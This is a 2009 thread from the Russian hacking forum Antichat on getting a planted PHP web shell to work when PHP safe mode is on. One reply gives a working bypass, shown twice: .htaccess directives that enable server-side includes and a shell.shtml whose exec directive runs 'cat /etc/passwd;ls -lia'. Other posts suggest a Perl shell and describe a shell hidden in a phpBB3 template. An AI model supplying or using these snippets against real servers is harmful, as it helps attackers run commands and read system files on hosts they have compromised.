Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Safe mode = on (https://forum.antichat.xyz/showthread.php?t=145553)

imgreen 03.10.2009 23:49
Safe mode = on
 
Можно что-то сделать в данной ситуации? Я правильно понимаю, что в таком случае от шелла нет толку?

diehard 04.10.2009 00:01
А что тебе надо от шелла? Команды ОС можно запускать из-под SSI например

.htaccess
AddType text/html .shtml
AddHandler server-parsed .shtml
Options +Includes

shell.shtml
<pre>
<!--#exec cmd="cat /etc/passwd;ls -lia"-->

BlackSun 04.10.2009 00:03
Версия пыха какая? доступ к CGI \ SSI \ и тп есть?

imgreen 04.10.2009 00:18
Цитата:
Команды ОС можно запускать из-под SSI например

.htaccess
AddType text/html .shtml
AddHandler server-parsed .shtml
Options +Includes

shell.shtml
<pre>
<!--#exec cmd="cat /etc/passwd;ls -lia"-->
спасибо за информацию

Цитата:
А что тебе надо от шелла?
просмотр каталогов, редактирование файлов


Цитата:
Версия пыха какая? доступ к CGI \ SSI \ и тп есть?
Эмм, я вообще не про конкретный случай, а в общем случае... Но вообще вопрос возник в результате эксперимента на своем сервере. Шелл залил, а сделать как бы ничего и нельзя. PHP 5.2.6, c CGI и SSI дела не имел, даже не знаю как проверить доступ.

DrAssault 04.10.2009 05:30
Perl шелл как вариант...

InFlame 04.10.2009 11:58
http://forum.antichat.ru/thread46034-safe+mode.html

imgreen 04.10.2009 18:06
большое спасибо

Shadrin 05.10.2009 15:16
в догонку,был шел в шаблоне пхпбб3,при Safe mode = on,версию пхп уже не помню,но когда я создавал шеллом файл(другой шелл) ,и при обращении с браузера было "access denied ", это уже тупик или можно что то сделать?
юзер апач,и права на создынный шелл были не ниже 644


Время: 16:00